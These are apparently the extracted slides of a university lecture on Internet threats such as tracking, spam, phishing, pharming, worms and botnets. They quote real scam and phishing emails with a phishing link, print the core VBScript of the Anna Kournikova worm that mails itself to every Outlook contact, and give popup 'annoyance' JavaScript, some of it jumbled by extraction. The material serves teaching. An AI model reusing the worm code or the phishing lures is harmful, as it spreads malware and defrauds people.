Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Data Mining

11/30

advertisement 
COS 109 Monday November 30
• Housekeeping
– Lab 7 and Problem Set 8 available now
– Final exam – January 18 (Monday) at 7:30PM
• Today’s class
– A variety of forms of bad behavior on the Internet
Malware
Botnets
Internet censorship
Cookies are not the only tracking mechanism
• web bugs, web beacons, single-pixel gifs
– tiny images that report the use of a particular page
– these can be used in mail messages, not just browsers
• Flash cookies ("local shared object")
– cookie-like mechanism used by Flash
• "super cookies"
– e.g., Verizon's X-UIDH HTTP header on cellphones
• HTML canvas fingerprinting
– uses subtle differences in browser behavior to distinguish users
• defenses:
addons like AdBlock, FlashBlock, Cookie Monster,
Ghostery, NoScript
But, companies can retaliate
http://webpolicy.org/2014/10/24/how-verizons-advertising-header-works/
Plug-ins, add-ons, extensions, etc.
• programs that extend capabilities of browser, mailer, etc.
– browser provides API, protocol for data exchange
– extension focuses on specific application area
e.g., documents, pictures, sound, movies, scripting language, ...
– may exist standalone as well as in plug-in form
– e.g., Acrobat Reader, Flash, Quicktime, Windows Media Player, ...
• scripting languages interpret downloaded programs
– Javascript
– Java
compiled into instructions for a virtual machine
(like the Toy machine on steroids)
instructions are interpreted by virtual machine in browser
Javascript tracking
• most web pages include some Javascript
• some is used for interactive features, validation, etc.
• much is used for tracking:
"Google Analytics offers a great breadth of functionality - you
can use it to track visitor flow through your site, to view the
source of referrals to your site, and to see how well visitors
make it through a conversion process such as purchasing an item
or signing up for a newsletter."
• defenses:
NoScript disables all Javascript
Ghostery disables Javascript trackers from a list
Potential security & privacy problems
• attacks against client
client
net
server
– release of client information
cookies: client remembers info for subsequent visits to same server
– adware, phishing, spyware, viruses, ...
spyware: client sends info to server upon connection (Sony, …)
often from unwise downloading
– buggy/misconfigured browsers, etc., permit vandalism, theft, hijacking, ...
• attacks against server
– client asks server to run a programs when using cgi-bin
server-side programming has to be careful
– buggy code on server permits break-in, theft, vandalism, hijacking, …
– denial of service attacks
• attacks against information in transit
– eavesdropping
encryption helps
– masquerading
needs authentication in both directions
Privacy on the Web
• what does a browser send with a web request?
– IP address, browser type, operating system type
– referrer (URL of the page you were on)
– Cookies
• Which browser am I using?
• what do "they" know about you?
–
–
–
–
–
–
–
whatever you tell them, implicitly or explicitly (e.g., Facebook)
public records are really public
lots of big databases like phone books
log files everywhere
aggregators collect a lot of information for advertising
spyware, key loggers and similar tools collect for nefarious purposes
government spying is everywhere
• who owns your information?
– in the USA, they do
– less so in the EU
Targeted advertising at Target
Whenever possible, Target assigns each shopper a unique code —
known internally as the Guest ID number — that keeps tabs on
everything they buy. “If you use a credit card or a coupon, or fill
out a survey, or mail in a refund, or call the customer help line,
or open an e-mail we’ve sent you or visit our Web site, we’ll
record it and link it to your Guest ID … We want to know
everything we can.”
Also linked to your Guest ID is demographic information like your
age, whether you are married and have kids, which part of town
you live in, how long it takes you to drive to the store, your
estimated salary, whether you’ve moved recently, what credit
cards you carry in your wallet and what Web sites you visit.
Target can buy data about your ethnicity, job history, the
magazines you read, if you’ve ever declared bankruptcy or got
divorced, the year you bought (or lost) your house, where you
went to college, what kinds of topics you talk about online,
whether you prefer certain brands of coffee, paper towels, cereal
or applesauce, your political leanings, reading habits, charitable
giving and the number of cars you own.
Public records
• election contributions are public records
• house purchases are public records
• census data is confidential for 72 years
Website of the day – is this bad behavior?
An email I received a few years ago
•
•
•
From: Elizabeth Swart [mailto:swarte@nwpg.gov.za]
Sent: Monday, November 25, 2013 7:35 AM
Subject: Your password will expire in 3 Days
Dear e-mail owner,
Your password will expire in 3 Days CLICK HERE to validate your e-mail.
•
•
•
Thanks
System Administrator
Disclaimer
"This e-mail and any files transmitted with it may contain information which
is confidential, private or privilege in nature and it is for the sole use of the
recipient to whom it is addressed. If you are not the intended recipient, you
must immediately notify the sender via electronic mail and further refrain
from reading, disseminating, distributing, copying or using this message or
any of its transmitted files. Any views of this message and its transmitted
files are those of the sender unless the sender specifically states such views
to be those of the North-West Provincial Government. Though this message
and its transmitted files have been swept for the presence of computer
viruses, the North-West Provincial Government accepts no liability
whatsoever for any loss, damage or expenses resulting directly or indirectly
from the use or access of this message or any of its transmitted files."
More spam
Date: Thu, 8 Oct 2015 08:03:21 -0700
From: Marilyn Fagles <marilynfagles@yahoo.com>
Reply-To: marilynfagles@outlook.com
To: undisclosed recipients: ;
Subject: How Are You Doing???
Good Morning,
Can i ask you to do me a favor?
Best, Lynne
Date: Thu, 26 Nov 2015 03:01:07 +0100 (CET)
From: Liliane Bettencourt <khadija.hadj-salem@lcis.grenoble-inp.fr>
Reply-To: Liliane Bettencourt <lilianbett@outlook.com>
To: undisclosed-recipients: ;
Subject: Donation
-I, Liliane authenticate this email of 3.5M USD donation to you,please view
my link: http://en.wikipedia.org/wiki/Liliane_Bettencourt and Email me on
lilianbett@outlook.com for more info
I, Liliane authenticate this email
of 3.5M USD donation to you,please view my link:
http://en.wikipedia.org/wiki/Liliane_Bettencourt and Email me on
lilianbett@outlook.com for more info
Even more spam
Date: Sun, 27 Sep 2015 06:07:23 -0700
From: Kmart~Reward~Center <KmartRewardCenter@achenavy.win>
To: david@daviddobkin.com
Subject: Kmart Thank You Bonus, No. 24051150
$50 Kmart Reward
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
Kmart Member david@daviddobkin.com
This week only we are offering a $50 Reward for all Kmart shoppers. (Expires 28Sep2015)
Go here to claim your Kmart Voucher today- http://details.bonusgiftrewards.date
Thanks again for shopping with us.
Kmart
Shop Your Way
===================================
Shopping Bonus No. 24051150
Shopper ID: KB2873212
Bad things that people do
•
•
•
•
•
•
•
•
Spam
Worms
Viruses
Phishing
Pharming
Pagejacking and mousetrapping
Flybox
Denial of service
(some of) this morning’s spam
Spam
Date: wo, 29 jan 2003 15:42:30
From: "mawelala2003@rediff.com" <mawelala@mail.com>
To: dpd@CS.Princeton.EDU
Subject: URGENT PARTNERSHIP
REQUEST FOR FINANCIAL TRANSACTION
I am pleased to introduce myself to you. My name is Mr.Joseph Mawelala a native of South Africa currently on course here in the
Netherlands.
I am writing this letter to request your assistance in order to redeem an investment with the then South African mining cooperation
now the ministry of natural resources. The said investment, now valued at $19,750,000.00 (Nineteen million seven hundred and
fifty thousand dollars) was purchased by Mr.Lucio Goran and contracted out of South African mining cooperation in 1977.The
redeemable investment interest, has now fully matured since last year.
Since March last year, several attempts have been made to contact Mr Lucio without success. And there is no way to get in touch with
any of his close relatives in whose favour the investment cash value can be paid.
Since we have asses to all Mr.Lucios information?s we can actually claim this money with the help of my partner in the ministry of
natural resources. All we have to do is to file claims using you as Mr.Lucios relative, whom the money will be paid to without delay.
I Would like to assure you that there is absolutely nothing to worry about, because it is perfectly safe and risk free. Please ensure to
keep this matter strictly confidential. My partner will file for the claims of this money on your behalf in the south African Mining
cooperation. When the claim is approved, you as the beneficiary would be paid the sum of $19,750.000.00.
Due to the fact that the money can be paid into any bank account of your choice, your responsibility is to assure us that my partners and
I receive 70%of the total sum. While you keep 25% for your assistance and the balance 5% would be set aside for any expenses
that maybe incurred in the course of this transaction.
I would appreciate if you can give your assistance and guarantee that our share would be secured. Please for the sake of confidentiality
you can reach me on my personal email(mawelala@mail.com).Let me know if this proposal is acceptable to you.
TRULY YOURS,
JOSEPH MAWELALA.
What becomes of people who send messages such as this?
Worms
• Internet worms are truly autonomous virtual viruses,
spreading across the net, breaking into computers, and
replicating without human assistance and usually without
human knowledge. http://www.livinginternet.com/i/is_vir_first.htm
The impact of a worm on a Windows machine
• A worm in action
The first worm
•
•
The first worm. The first worm disabled most of the Internet then
existing. Robert Morris, a Computer Science graduate student at
Cornell University and (embarrassingly) son of the Chief Scientist at
the National Computer Security Center, wrote a 99 line program in
the C language designed to self-replicate and propagate itself from
machine to machine across the Internet. The worm performed the
trick by combining a bug in the debugging mode of the sendmail
program used to control email on almost all Internet computers, a
bug in the finger program, and the Unix rexec and rsh commands.
On November 2, 1988, Morris released his worm, but did so from an
MIT computer to disguise his origin. In his view, only one thing went
wrong -- the worm started replicating at a much faster rate than
he had predicted, and began crashing and disabling computers across
the Internet.
Morris sent out an anonymous message telling people how to disable
the worm, but because it had brought down the Internet, the
message about how to disable it couldn't get through. The worm
eventually infected more than 6,000 computers across the Internet.
Within a day teams of programmers at the University of California
at Berkeley and Purdue University reverse engineered the worm and
developed methods of stopping it. The Internet then came back to
normal in a couple of days.
A more recent worm
• Stuxnet (2010)
– Believed to have been developed by Israel and the USA
– Attacked sites in Iran
The uranium enrichment plant at Natanz
Destroyed roughly 1/5 of the centrifuges by causing them to spin out
of control
– First publicly known attack of cyber warfare
Viruses
• Internet viruses are spread like worms but have the power to
corrupt functions on your machine.
http://www.livinginternet.com/i/is_vir_first.htm st.htm
The Anna Kournikova virus
•
•
The Anna Kournikova computer virus was a computer virus authored
by Dutch programmer Jan de Wit on Feb 11, 2001. It was designed
to trick email users into opening a mail message purportedly
containing a picture of tennis player Anna Kournikova, while actually
hiding a malicious program. If set off, the program plunders the
address book of the Microsoft Outlook e-mail program and attempts
to send itself to all the people listed there.[1] The Kournikova virus
tempts users with the message: "Hi: Check This!", with what appears
to be a picture file labelled "AnnaKournikova.jpg.vbs".[1] The worm
arrives in an email with the subject line "Here you have, ;0)" and an
attached file called AnnaKournikova.jpg.vbs. When launched under
Microsoft Windows the file does not display a picture of Anna
Kournikova but launches a viral Visual Basic Script that forwards
itself to everybody in the Microsoft Outlook address book of the
victim.
The virus was created using a simple and widely available Visual Basic
Worm Generator program developed by an Argentinian programmer
called “[K]Alamar”.[2] While similar to the ILOVEYOU virus that
struck a year earlier, in 2000, the Anna Kournikova virus did not
[2]
corrupt data on the infected computer.
From http://en.wikipedia.org/wiki/Anna_Kournikova_(computer_virus)
Inner core of Anna Kournikova
Set OUTLOOK = CreateObject("Outlook.Application")
If OUTLOOK= "Outlook"Then
Set MAPI=OUTLOOK.GetNameSpace("MAPI")
Set ADRLISTS= MAPI.AddressLists
For Each adr In ADRLISTS
If adr.AddressEntries.Count <> 0 Then
adrcount = adr.AddressEntries.Count
For idx= 1 To adrcount
Set item = OUTLOOK.CreateItem(0)
Set entry = adr.AddressEntries(idx)
item.To = entry.Address
item.Subject = "Here you have, ;o)"
item.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""
set attach=item.Attachments
attach.Add FILESYSTEMOBJ.GetSpecialFolder(0)&
"\AnnaKournikova.jpg.vbs"
item.DeleteAfterSubmit = True
If item.To <> "" Then
item.Send
SHELL.regwrite "HKCU\software\OnTheFly\mailed",
"1"
End If
Next
End If
Next
end if
Warning: Don’t try this at home
• De Wit was tried in Leeuwarden and was charged with spreading
data into a computer network with the intention of causing
damage, a crime that carried a maximum sentence of four years
in prison and a fine of 100,000 guilders (US$41,300).[4]
• The lawyers for Jan de Wit called for the dismissal of charges
against him, arguing that the worm caused minimal damage. The
FBI submitted evidence to the Dutch court and suggested that
US$166,000 in damages was caused by the worm. De Wit
admitted he created the worm using a virus creation toolkit but
told the court when he posted the virus to a newsgroup he did it
"without thinking and without overseeing the consequences". He
denied any intent to cause damage. De Wit has been sentenced
to 150 hours community service or 75 days in jail.[4]
How do viruses spread
• Watching a virus spread (circa 2001)
• Famous viruses
• A more recent virus attack
Phishing
• A phishing attack is an attempt to get your credit card or other
personal information.
• Phishing attacks are often done by using a fake website that
mimics a valid site.
A phishing attack
Date: Mon, 6 Nov 2006 09:23:09 -0500
From: Sears Card <accounts@searscard.com>
Subject: Sears Card Account Payment Notification
Sears Card Account Payment Notification
A payment posted to your Sears Card account on or before 30 October 2006.
IP address: 86.102.33.19
Because the Lookup Country for this IP address, we decided to restrict your Sears Card account
features in order to protect our entire payment system form future fraudulent transactions.
To report unauthorized use of your account, to change your password, to check available
credit, or for more information about your account, go to:
http://ns2.fastpace.com.hk/usage/.www.sears.com/us/cards/update.php?CARD=update
This message is for information purposes only.
Please understand that we cannot respond to individual messages through this email address. It
is not secure and should not be used for credit card account related questions.
For questions about your credit card, please Contact Us:
http://ns2.fastpace.com.hk/usage/.www.sears.com/us/cards/update.php?CARD=update
After you have submitted your information, check for a response within 4-four business days.
Just return to the Write to Customer Care section and select the View/Update Messages
link.
From the web…
If you search for IP address: 86.102.33.19
• You get to http://www.millersmiles.co.uk/report/3724
• How not to get phish'ed
Pharming
•
Pharming (pronounced “farming”) is another form of online fraud, very similar to its cousin
phishing. Pharmers rely upon the same bogus Web sites and theft of confidential information
to perpetrate online scams, but are more difficult to detect in many ways because they are
not reliant upon the victim accepting a “bait” message. Instead of relying completely on users
clicking on an enticing link in fake email messages, pharming instead re-directs victims to the
bogus Web site even if they type the right Web address of their bank or other online
service into their Web browser.
Pharmers re-direct their victims using one of several ploys. The first method – the one that
earned pharming its name – is actually an old attack called DNS cache poisoning. DNS cache
poisoning is an attack on the Internet naming system that allows users to enter in meaningful
names for Web sites (www.mybank.com) rather than a difficult to remember series of
numbers (192.168.1.1). The naming system relies upon DNS servers to handle the conversion
of the letter-based Web site names, which are easily recalled by people, into the machineunderstandable digits that whisk users to the Web site of their choice. When a pharmer
mounts a successful DNS cache poisoning attack, they are effectively changing the rules of
how traffic flows for an entire section of the Internet! The potential widespread impact of
pharmers routing a vast number of unsuspecting victims to a series of bogus, hostile Web
sites is how these fraudsters earned their namesake.
•
Phishers drop a couple lines in the water and wait to see who will take the bait. Pharmers
are more like cybercriminals harvesting the Internet at a scale larger than anything seen
before.
http://us.norton.com/cybercrime/pharming.jsp
Pharming example
One of the first known pharming attacks was conducted in early 2005.
Instead of taking advantage of a software flaw, the attacker
appears to have duped the personnel at an Internet Service Provider
into entering the transfer of location from one place to another.
Once the original address was moved to the new address, the
attacker had effectively “hijacked” the Web site and made the
genuine site impossible to reach, embarrassing the victim company
and impacting its business. A pharming attack that took place weeks
after this incident had more ominous consequences. Using a software
flaw as their foothold, pharmers swapped out hundreds of legitimate
domain names for those of hostile, bogus Web sites. There were
three waves of attacks, two of which attempted to load spyware and
adware onto victim machines and the third that appeared to be an
attempt to drive users to a Web site selling pills that are often sold
through spam email.
http://us.norton.com/cybercrime/pharming.jsp
Other forms of bad behavior
•
•
•
•
•
•
mousetrapping
A practice employed by some Web sites in which the back and exit
buttons of a visitor's Web browser are disabled and attempts to
leave the site are redirected to other pages on the site or to other
sites against the visitor's will. Mousetrapping is most often
associated with adult-oriented Web sites.
page-jacking
A deceptive practice that detours Web visitors from legitimate sites
generated as search engine results to copycat Web pages, from
which they will be redirected to pornographic or other unwanted
sites. Page-jacking is accomplished by copying the contents and
metatags of a Web page, altering its title and content so that, on
search results, it displays before the original, and then submitting
the copied page to search engines. When clicking on the link to the
copied site, the visitor will instead be redirected to an unwanted and
unrelated site. This can happen in larger arenas as well.
http://docs.law.gwu.edu/facweb/claw/mousetrap1.htm
Rerouting
Border gateway protocol (BGP) is the glue that holds the internet
together. If bad information is in routing tables, bad things can
happen. E.g. routing through China or Belarus and more detail
Mousetrapping code
<html>
<head>
<title>A Web annoyances</title>
<body>
This would be annoying if instead of presenting a lovely picture,
(<a href="javascript:void(0)" onMouseOver="m =
window.open('Eisgruber.jpg','PopUp2','width=200,height=300,menubar=no');
return true;"
onMouseOut=" m.window.close(); return true;" >a porno photo came up
</a>).
<br>
<P>
</body>
</html>
Other annoyances
• Flybox
Setting the Javascript code
var URL = [];
var dy = [];
var x = [];
var win = [];
var y = [];
var NUM = 7;
URL[1] = "Carson.jpg“
URL[4] = "Obama.jpg“
URL[7] = "Trump.jpg“
URL[2] = "Christie.jpg“
URL[5] = "Rubio.jpg“
var w=300, h=300;
for (i = 1 ; i <= NUM ; i++ )
x[i] = (i-1)*w/NUM;
dx[i] = 3*i;
}
var interval = 8;
{
var dx = [];
URL[3] = "Clinton.jpg"
URL[6] = "Sanders.jpg"
y[i] = (i-1)*h/NUM;
dy[i] = 3*i;
for (i = 1 ; i <= NUM ; i++ ) {
win[i] = window.open(URL[i], "", "width=" + w + ",height=" + h);win[i].moveTo(x[i],y[i]);
}
var intervalID = window.setInterval("bounce()", interval);
Bounce function
function bounce() {
for (i = 1 ; i <= NUM ; i++ ) {
if ((x[i]+dx[i] > (screen.availWidth - w)) || (x[i]+dx[i] < 0)) dx[i] = -dx[i];
if ((y[i]+dy[i] > (screen.availHeight - h)) || (y[i]+dy[i] < 0)) dy[i] = -dy[i];
x[i] += dx[i];
y[i] += dy[i];
win[i].moveTo(x[i],y[i]);
}
}
Something to turn it off
<form>
<input TYPE=button VALUE="Stop those DARN boxes!"
onClick="clearInterval(intervalID); win.close();">
</form>
Denial of Service attacks
• How do they come about?
Botnets and their actions
• Build a network of computers (botnet)
– bot’s are computers that were not well secured
– botnet takes control of bots and turns them into zombies
– botnets can involve hundreds of thousands of zombies
• bots spend their time
–
–
–
–
–
Finding other machines to convert to zombies
Sending spam
Sending viruses
Sending spyware
Doing other bad things
Uses of botnets
• DoS (Denial of service attacks)
– Attack a given site with a large flow of traffic
– Possibly extort money from the Web site owner in exchanging for
stepping back (ransomware)
• Clickfraud
– Use a botnet to boost advertising revenue by automatically clicking on
ads
Workarounds
• Secure email
• “Last year I was being held in a foreign Country (Tonga). Their
government, through the efforts of a local businessman and his
computer wise son, were tapping into my hotmail. They were
reading all of my Hotmail, communications between my USA
attorney and myself.
• They always seemed to be ahead of our game. We could not
understand how they knew so much about what we were doing.
Since my actual freedom was in question a friend told me about
your mail system. We all downloaded and started using it. The
intrusions stopped the first time running.
• I was able to use the legal system to get my passport back and
the ability to return to the USA. My business was lost and so
was my money, but I am fine and not being detained in that
corrupt country any longer and have started to rebuild.
• Thank you for this service and I hope that it continues to grow.”
• Anonymous
From http://www.hushmail.com/about/testimonials/
Further workarounds
• Tor for Onion routing – encrypting through multiple layers
– Testimonial
– Protecting online privacy
• Telegram for secure messaging
• Wickr – the most trusted messenger in the world
• Open Whisper systems for free worldwide encrypted phone calls
The other side of the coin
• Censorship in China
• Censorship in Saudi Arabia
• Tor stinks
Download
advertisement